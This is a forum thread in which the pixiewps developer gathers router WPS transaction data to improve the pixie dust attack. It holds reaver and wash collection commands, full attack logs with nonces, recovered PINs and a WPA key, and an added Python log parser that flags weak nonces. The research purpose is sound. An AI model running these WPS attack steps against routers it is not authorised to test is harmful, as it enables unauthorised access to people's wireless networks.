
Thread: Data gathering for pixiewps (pixie dust attack)

  1. #1
    Member
    Join Date
    Mar 2015
    Posts
    54

    Data gathering for pixiewps (pixie dust attack)

    Hi everyone,
    we have decided to start collecting data again for the WPS pixie dust attack (pixiewps), however we will be thorough this time:
    1. The data must be collected with Reaver 1.6.3 and with the new -vvv debug option (now included in kali)
    2. A set of data must contain a full transaction from M1 to M7 (thus you MUST know the PIN)
    3. 2 consecutive transactions (2 sets of data close in time) would be ideal (run reaver once, grab the data, then run reaver again, grab the new data)
    4. The data should be filtered with logfilter.py
    5. Please include the model / name of the router (possibly using wash --json for the specific router, you can edit out the BSSID and ESSID for privacy reasons)
    6. DO NOT use -S (--dh-small)
    7. Which data do we want? See below:

    • (Cheap) Tenda routers (like the N304, by default they may have WPS disabled), even if pixiewps is successful
    • Realtek that pixiewps can't pwn (some RTL8671 ?)
    • Data where nonces (E-nonce) follow a weird pattern like xx:xx:00:00..., 00:00:xx:xx... etc. (eg. 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45)
    • Other cheap routers (that don't run hostapd)

    The latest pixiewps uses multi-threading so you may want to use that instead of the one included in kali. Some changes are still in the works so I won't push a new tag for now.

    UPDATE:
    We also need data for devices that have these fields:
    1. Manufacturer: D-Link Corp.
    2. WPS: Model Name: RTL8xxx
    3. WPS: Model Number: EV-2010-09-20
    4. WPS: Serial Number: 123456789012347
    5. WPS: Device Name: RTL8196d (or RTL8196e)


    Which could be:
    1. D-Link DIR-615 rev N1
    2. D-Link DIR-615S rev A1
    3. D-Link DIR-620 rev A1A
    4. D-Link DIR-620 rev E1


    From 2015 to 2017.

    To collect data you can use something like this (be sure to use the correct pin):
    Code:
    sudo -i
    reaver -vvv -i MONITOR -b BSSID -p PIN 2>&1 | tee reaver.log
    cat reaver.log | python2 logfilter.py 1>&2 2>PIXIEDATA.TXT
    wash -i MONITOR -j --scan -n 25 | grep -i BSSID | tee ROUTERDATA.JSON
    You can also copy and paste the full logs if you have problems following this procedure.

    Remember that in most cases WPS 2.0 locks after 10 FAILED attempts. After that a reboot is required to reset.

    Why collect data again after all this time?
    Pixiewps has improved over time, now it's more mature and so is Reaver. But there are still potential vulnerable devices out there and margins for improvement overall.

    Please keep the thread related to gathering data only. Post questions only if important. That is also the reason why I'm starting a new thread, the others are too clogged up. Hope the mods don't mind.
    Last edited by wiire; 2017-11-24 at 09:50 AM. Reason: fixed example commands

  2. #2
    Junior Member
    Join Date
    Nov 2017
    Location
    Russia, Moscow
    Posts
    1
    Quote Originally Posted by wiire View Post
    The data must be collected with Reaver 1.6.3 and with the new -vvv debug option (now included in kali)
    Is it ok to post the data from the latest Router Scan nightly build? Here's one for example:

    Huawei HG8245H (device #1)

    Code:
    [*] Audit started at 2017.11.22 22:06:30 (UTC+03:00).
    [*] E-Nonce: 68BE01DF8A8DB9794F3126C582F9A274
    [*] PKE: E8CCCEBB58C29F9F4850E63E2E9206623765CCC8BBC0382C531E62FD8B90BF2FC7A132F398D7E8E037160BBFAB1E30E95856FF813E88282CD2CA42CE905A9CF7FBEB9D206EF6BFDB95590030D7A3D41FC9F362F2AFF3ED9FC14534E2872C8319EFEA5524DEE674EDC43843628C9F8F02CE675DB76B4B5A679C1375420E0304136E1E7C917602598E696DEDEE76B17601C8F01E50EE8CFDC023A774670EF00B96E3DABB2E963BA81A8FFEDD699A71D41581400691D39772CF1B150D6B907279CF
    [*] Manufacturer: Huawei
    [*] Model Name: Huawei
    [*] Model Number: HG8245H
    [*] Serial Number: 39
    [*] Device Name: HuaweiONT
    [*] PKR: E40D6B624FB03754E7231B8CBECA1C049DEB272173227B768E3D2C860E9E0C8EC1FFA4D7DBD1F8B2486EDFDB510AA19EE2D6598210D135DC226BC4181AB7197993B39A7270CD7A7DD60FCA03EDE3697C1F8B21962878157169EF17D099D769CF24874A2E077696DEAAF152C485E09F733445191D6D44A22187F241F2B3A9737E96AEFAF27378775A623844AD16AA48A69B4C07772C929843D9EACF77E9FCEE514BAC7602C16A0CB8048BD52FAAB6466055EF38B630E937717060AEAD79EC59EF
    [*] AuthKey: A1778780E59EC72194AF1BC977FAE6ED1214126151D1509AA49CF0298E19CD4E
    [*] E-Hash1: 02D302C8AA7E2D3AB161C48AF29E439F438C4903E298B3FFE6F5B0845C97A58E
    [*] E-Hash2: C77B53318827FC12DF2ECFDB445BC702E848D3BBD0156D6B878221465A82B42E
    [*] E-S1: DE030256AF7F4A8D5E52FBEA277C471D
    [*] E-S2: EF25F4668C2FE0FB55BCA8973094690E
    [*] Audit stopped at 2017.11.22 22:06:39 (UTC+03:00).
    
    [*] Audit started at 2017.11.22 22:06:40 (UTC+03:00).
    [*] E-Nonce: C240EB3DAC82A15C913C893D9FACEF42
    [*] PKE: A5EA92289132F132D8ADADA9D8169C89F0645B1757E7D1FCA3FDA81D41E4501FA99641D8D4865DA72709FCC66762769826793F7FCE685ECBABBFEC880951A4A2E4C2BA45E7DE20D3FFD0BC44868DE2E1AE8C267B50DB41F6543EA358277FCA1FD98CF682CAAFE522D751DD71DD4B88B90C5BCB03195F78C6EB05376E0A437A6B657472D99E4A671A0158FCAF6CD242762B8E36E1C4A41085D8ED8DDE44588325E1AE32AB77C0953DA047F30D431C2C06DECEC4AD341FEF9C350D37935FF89690
    [*] PKR: B2A1FC3590D9C2AD249E0368C0919AD142E16144727F8E6A2BD7BF1F7A85488FBC2876189617EAA78C24E02697C81FD5D18120B31A82B84B349EA1E11E592224B8151095647C4A1EF79D47F7D1451D78380B7F0F90BFCD60D9C2E453FD54BE93152A06D030E54A72F0384E110352D68014EA8977DB61A0FCFFB38A665B3D1ACC0FED9A0EDD1A2FA0A9A438BB16AA2E5B425E9203BDDF4A71D0897551AC1879013E26985D6BB4ABF8EECCC86B22A2BFE9E8CC6BCEC215B7D2D6C57BF396BAF321
    [*] AuthKey: 8850EABC8F169ABF32C8A35AB560355665E7612729BBBBB629AA741C8AB89088
    [*] E-Hash1: 8C1CA9A83EFE84CD7E0564B11904B2B3374E2B4D386B18DB4E8AB0EE54DD3BC9
    [*] E-Hash2: 15BFE6BB5FE0198FC3B8466F038CB64291B1825CBB87784DB82296AB686782B5
    [*] E-S1: 0715E717B90532588D2448049FE0D744
    [*] E-S2: 5A3C4CEBB2EE1D30B6E822EE6CCA7450
    [*] Audit stopped at 2017.11.22 22:06:49 (UTC+03:00).
    Last edited by binarymaster; 2017-11-22 at 09:11 PM.
    by Stas'M

  3. #3
    Member
    Join Date
    Mar 2015
    Posts
    54
    Yes, thank you. Enrollee nonce, the 2 secret nonces and details like brand, model etc. are the most important data.

    Sorry I haven't replied sooner, I had problems logging in on the forum.

    @everyone
    If you have trouble following the instructions, just copy and paste the full logs by hand. Maybe use a pastebin or similar if you don't want to clog everything up.

  4. #4
    Junior Member
    Join Date
    Jan 2016
    Posts
    6
    ASUS ADSL home gateway, model DSL-N10E, firmware ver. 2.1.19_EU
    Realtek that pixiewps can't pwn (some RTL8671 ?)
    Data where nonces (E-nonce) follow a weird pattern like xx:xx:00:00..., 00:00:xx:xx... etc. (eg. 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45)
    2 datasets below
    Code:
    [*] Audit started at 2017.12.05 19:51:00 (UTC+02:00).
    [*] Associating with AP...
    
    [+] Associated with 74:D0:2B:84:41:D7 (ESSID: Natalya).
    [*] Trying pin "13850319"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 0000497B000030CF00003B58000042CB
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: Realtek Semiconductor Corp.
    [*] Model Name: ADSL Router
    [*] Model Number: EV-2006-07-27
    [*] Serial Number: 123456789012347
    [*] Device Name: ADSL Router/Modem IGD
    [*] Sending WPS Message M2...
    [*] PKR: 3B617AD18518A5D021C6B8EB2BC8DF881CF9DF7FB00C1C4E485C8F068B4871BA5ADDD26C4F6FBFB479EF8298CFE2D39387E018656009DBD3D17F00FFA6F49D6577D48D2A84F0BF12AC111E122FD3C9F8996DB7856C38C54AD203AFF0F3E4D8D3E442DA0A67A19FE5DDB097BA7672B3504B1AC3466CDAEE183039BC8C99C5AD86787355821707B6223C6005CB1F690E0590381B93E08B1C163050AEA0A104EA22DE422B9CD76AF37D8C8C3B596A43FD0B6FB617376C2792951E8C7B231B7B8583
    [*] AuthKey: 1FB4802250487E98E4B0F9D5AD0C859348AC6CC583ECBCEB6B6B5D9D880864C1
    [*] Received WPS Message M3.
    [*] E-Hash1: 4C6143B908F5226DEE0C40078478FDFD3495571DCFEDB2A912424D79E361E3C1
    [*] E-Hash2: F6D95087CDE720EBD0DAEDD7511DE6A6A8FC6697F88579AFEF12A3F399D6D64A
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [*] E-S1: 00001003000015AE000015B700005776
    
    [+] First half found: 1385
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] E-S2: 0000139000001AF4000016B300003383
    [*] Sending WSC NACK...
    [*] EAP session closed.
    
    [+] WPS PIN: 13850319
    
    [+] SSID: Natalya
    
    [+] Key: 1234567890
    
    [+] Key Index: 1
    [*] Audit stopped at 2017.12.05 19:51:09 (UTC+02:00).
    [*] Audit started at 2017.12.05 19:51:10 (UTC+02:00).
    [*] Associating with AP...
    
    [+] Associated with 74:D0:2B:84:41:D7 (ESSID: Natalya).
    [*] Trying pin "13850319"...
    [*] Sending EAPOL Start...
    
    [-] Request timed out.
    [*] Trying pin "13850319"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 000079F70000103D000030B600007DEC
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: Realtek Semiconductor Corp.
    [*] Model Name: ADSL Router
    [*] Model Number: EV-2006-07-27
    [*] Serial Number: 123456789012347
    [*] Device Name: ADSL Router/Modem IGD
    [*] Sending WPS Message M2...
    [*] PKR: 6C61743CBE029AD0455553B23F05F154A076140505CB9C29F3D3685652F4A10EAB2C7C8E8C5DD039033A08CF3CA078940C8A8A00CE7D171E364F611E897DD9486C287755E30357275D6CEB7E97101C2D71398C3E2960384B169883C9FC7068E64E680FD73558A317C197CAB19CD669F0BD65CDB57F419B91F56E6473D6A112E2D79685258D2E6AC3DD5659D45FA759BDD420BF5FA9C8702E8021BF45DE2E42488BE048A59024D9B471DC05B03B0CE7AF8945CF95848857CEF2F6C663C55218F4
    [*] AuthKey: 0EF51A6ED5BEE1647480B874EFD0400010F7D287429132E3FD912ED1B5002BE9
    [*] Received WPS Message M3.
    [*] E-Hash1: 1B761BB7DE29C0CF8839B6F0858583814F001E95EFBF918F27C640A532207941
    [*] E-Hash2: B74C37199A8FB5A22DA2EC48DE2D2919F17D658E10FFD6CFFBB92E9775480771
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [*] E-S1: 00007EB90000327A00000A9800002491
    
    [+] First half found: 1385
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] E-S2: 00000246000037BF00000B940000009E
    [*] Sending WSC NACK...
    [*] EAP session closed.
    
    [+] WPS PIN: 13850319
    [+] SSID: Natalya
    [+] Key: 1234567890
    [+] Key Index: 1
    [*] Audit stopped at 2017.12.05 19:51:25 (UTC+02:00).
    [*] Audit started at 2017.12.05 19:51:30 (UTC+02:00).
    [*] Associating with AP...
    
    [+] Associated with 74:D0:2B:84:41:D7 (ESSID: Natalya).
    [*] Trying pin "13850319"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 000071E400005D9D000073000000066A
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: Realtek Semiconductor Corp.
    [*] Model Name: ADSL Router
    [*] Model Number: EV-2006-07-27
    [*] Serial Number: 123456789012347
    [*] Device Name: ADSL Router/Modem IGD
    [*] Sending WPS Message M2...
    [*] PKR: 4870430F9757C2871408F388EF668FE241502E28864A3F4D8F7E2B44D0E4BAFD284FFE81EFA5F1803C69969C49DF851BD5C65D828DBF685873C99025D565175023D142F5B73BEB807D16301853DE3B1E0427DF213B7A44820D1748576B2154620932B383142510C6D771BFAA715E1C17465456257C7010EE19E3FF7AA2DED803175D326B5BE102A0FD5B8077FD1E8359BA4AD59EB6F49F95302F4CDB3B64CE5D7FF809206B9B7125CEB288F20C18C5772699BEB04E0569229128CDD918F34B47
    [*] AuthKey: 56EB940A1260E08AD7871738D62D619EA88A163ABCC1EEEC45651B7D1991CAEE
    [*] Received WPS Message M3.
    [*] E-Hash1: DB2D80359B0D842048CB15BB3A8A55DE241B741E43459AB1938CD5A11AC5AF1F
    [*] E-Hash2: 045B9585812EE096F4325642C06739A91D9E8F5B51A5B6BC8996B91DC6A1CCFB
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [*] E-S1: 00007DBF00000A6400004ED900006529
    
    [+] First half found: 1385
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] E-S2: 0000014B00000FA900004FD500004136
    [*] Sending WSC NACK...
    [*] EAP session closed.
    
    [+] WPS PIN: 13850319
    
    [+] SSID: Natalya
    [+] Key: 1234567890
    [+] Key Index: 1
    [*] Audit stopped at 2017.12.05 19:51:39 (UTC+02:00).
    Last edited by ForumKali2016; 2017-12-05 at 05:56 PM.

  5. #5
    Member
    Join Date
    Mar 2015
    Posts
    54
    @ForumKali2016 Thank you very much!

    The router seems to be bugged, but not broken since the protocol goes through correctly (to M7).

    Code:
    0000497b 000030cf 00003b58 000042cb
    00001003 000015ae 000015b7 00005776
    00001390 00001af4 000016b3 00003383
    
    000079f7 0000103d 000030b6 00007dec
    00007eb9 0000327a 00000a98 00002491
    00000246 000037bf 00000b94 0000009e
    
    000071e4 00005d9d 00007300 0000066a
    00007dbf 00000a64 00004ed9 00006529
    0000014b 00000fa9 00004fd5 00004136
    Here's what you could do:
    - collect 20 - 30 consecutive sets of data, trying to keep the same distance in time between the runs (i.e. with a script, I'm sure @binarymaster would help)
    - record the exact date and time of the router when you start the whole process
    - check if NTP is enabled and if the router has the correct date and time set

    That would help a lot. Thank you again!
    Last edited by wiire; 2017-12-06 at 12:49 AM.
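    An added example (my own code, not from this thread, from wiire, or from the pixiewps / reaver / Router Scan projects) that does the two things the thread asks for: it pulls the WPS fields out of a "[*] Key: value" log like the ones posted above and checks that a transaction is complete from M1 to M7 with the expected field sizes (the job logfilter.py does in post #1), and it splits E-Nonce, E-S1 and E-S2 into 32-bit words the way post #5 lays them out, flagging the 0000xxxx pattern from post #1's bullet list and reporting how many bits of each word are actually used. It goes slightly beyond the thread in that it also accepts the colon-separated form reaver prints. The sample log is constructed from values already posted here (the first Realtek dataset from post #4 and the nonces from the Huawei post); SAMPLE_LOG, parse_transactions, nonce_stats and the other names are mine.

```python
import re
from typing import Dict, List

# Constructed sample log in the "[*] Key: value" format posted in this thread.
# Transaction 1 reuses the first Realtek dataset from post #4 (complete M1..M7);
# transaction 2 reuses only the three nonces from the Huawei post (#2), so it
# is deliberately incomplete.
SAMPLE_LOG = """\
[*] Audit started at 2017.12.05 19:51:00 (UTC+02:00).
[*] Received WPS Message M1.
[*] E-Nonce: 0000497B000030CF00003B58000042CB
[*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
[*] Manufacturer: Realtek Semiconductor Corp.
[*] Model Name: ADSL Router
[*] Model Number: EV-2006-07-27
[*] Serial Number: 123456789012347
[*] Device Name: ADSL Router/Modem IGD
[*] Sending WPS Message M2...
[*] PKR: 3B617AD18518A5D021C6B8EB2BC8DF881CF9DF7FB00C1C4E485C8F068B4871BA5ADDD26C4F6FBFB479EF8298CFE2D39387E018656009DBD3D17F00FFA6F49D6577D48D2A84F0BF12AC111E122FD3C9F8996DB7856C38C54AD203AFF0F3E4D8D3E442DA0A67A19FE5DDB097BA7672B3504B1AC3466CDAEE183039BC8C99C5AD86787355821707B6223C6005CB1F690E0590381B93E08B1C163050AEA0A104EA22DE422B9CD76AF37D8C8C3B596A43FD0B6FB617376C2792951E8C7B231B7B8583
[*] AuthKey: 1FB4802250487E98E4B0F9D5AD0C859348AC6CC583ECBCEB6B6B5D9D880864C1
[*] Received WPS Message M3.
[*] E-Hash1: 4C6143B908F5226DEE0C40078478FDFD3495571DCFEDB2A912424D79E361E3C1
[*] E-Hash2: F6D95087CDE720EBD0DAEDD7511DE6A6A8FC6697F88579AFEF12A3F399D6D64A
[*] Received WPS Message M5.
[*] E-S1: 00001003000015AE000015B700005776
[*] Received WPS Message M7.
[*] E-S2: 0000139000001AF4000016B300003383
[*] Audit stopped at 2017.12.05 19:51:09 (UTC+02:00).
[*] Audit started at 2017.11.22 22:06:30 (UTC+03:00).
[*] E-Nonce: 68BE01DF8A8DB9794F3126C582F9A274
[*] Manufacturer: Huawei
[*] Model Number: HG8245H
[*] E-S1: DE030256AF7F4A8D5E52FBEA277C471D
[*] E-S2: EF25F4668C2FE0FB55BCA8973094690E
[*] Audit stopped at 2017.11.22 22:06:39 (UTC+03:00).
"""

# Expected hex length of each M1..M7 value: 1536-bit DH public keys,
# 256-bit HMAC outputs and 128-bit nonces.
EXPECTED_HEX_LEN = {
    "PKE": 384, "PKR": 384, "AuthKey": 64, "E-Hash1": 64, "E-Hash2": 64,
    "E-Nonce": 32, "E-S1": 32, "E-S2": 32,
}
INFO_FIELDS = ("Manufacturer", "Model Name", "Model Number", "Serial Number", "Device Name")
NONCE_FIELDS = ("E-Nonce", "E-S1", "E-S2")
FIELD_RE = re.compile(r"^\[\*\] (%s): (.+)$" % "|".join(
    re.escape(k) for k in tuple(EXPECTED_HEX_LEN) + INFO_FIELDS))


def clean_hex(value: str) -> str:
    """Normalise a hex value: reaver prints 00:00:42:b4:..., Router Scan one run of hex."""
    return re.sub(r"[\s:]", "", value).upper()


def parse_transactions(log: str) -> List[Dict[str, str]]:
    """Split the log at each 'Audit started' line and collect the WPS fields per transaction."""
    txns: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    for raw in log.splitlines():
        line = raw.strip()
        if line.startswith("[*] Audit started"):
            current = {}
            txns.append(current)
            continue
        m = FIELD_RE.match(line)
        if m and txns:
            key, value = m.group(1), m.group(2).strip()
            current[key] = clean_hex(value) if key in EXPECTED_HEX_LEN else value
    return txns


def is_complete(txn: Dict[str, str]) -> bool:
    """True when every M1..M7 value the thread asks for is present with its expected size."""
    return all(len(txn.get(k, "")) == n for k, n in EXPECTED_HEX_LEN.items())


def words32(hex128: str) -> List[int]:
    """Split a 128-bit nonce into four big-endian 32-bit words, as post #5 lays them out."""
    h = clean_hex(hex128)
    if len(h) != 32:
        raise ValueError("nonce must be 128 bits, got %d hex chars" % len(h))
    return [int(h[i:i + 8], 16) for i in range(0, 32, 8)]


def nonce_stats(hex128: str) -> Dict[str, object]:
    """zero_high16 is the 0000xxxx pattern from post #1; effective_bits is the bit length
    of the largest word, an upper bound on how much of each word is actually random."""
    ws = words32(hex128)
    biggest = max(ws)
    return {"max_word": biggest,
            "zero_high16": all((w >> 16) == 0 for w in ws),
            "effective_bits": biggest.bit_length()}


def flag_weak_nonces(txn: Dict[str, str]) -> Dict[str, bool]:
    """For each nonce present, True when all four words show the 0000xxxx pattern."""
    return {k: bool(nonce_stats(txn[k])["zero_high16"]) for k in NONCE_FIELDS if k in txn}


def report(log: str) -> List[str]:
    """One summary line per transaction: device, completeness, weak-nonce flags."""
    out = []
    for i, t in enumerate(parse_transactions(log), 1):
        who = "%s %s" % (t.get("Manufacturer", "?"), t.get("Model Number", "?"))
        out.append("#%d %s complete=%s weak=%s" % (i, who, is_complete(t), flag_weak_nonces(t)))
    return out


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_LOG)))
```

    Run against the Realtek transaction, every word of E-Nonce, E-S1 and E-S2 has its high 16 bits clear and the largest word fits in 15 bits; the Huawei nonces use the full 32 bits of each word and are not flagged. The completeness check is what stops a half-captured run (an M1..M5 that timed out) from being mistaken for a usable dataset.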

  6. #6
    Junior Member
    Join Date
    Jan 2016
    Posts
    6
    New datasets - untouched output from a fresh Kali distro terminal:
    http://www43.zippyshare.com/v/oioRqXdZ/file.html
    Reaver started at exactly 18:44:00 GMT+2 08.12.2017 by the router clock (or maybe +-2 sec). Delay between attempts = 1 sec or less, I tried to restart reaver as fast as I could, but some misclicks are present.

  7. #7
    Member
    Join Date
    Mar 2015
    Posts
    54
    OK, thank you! Meanwhile I think @binarymaster was adding some features to RS, to make it easier for testing / gathering data.
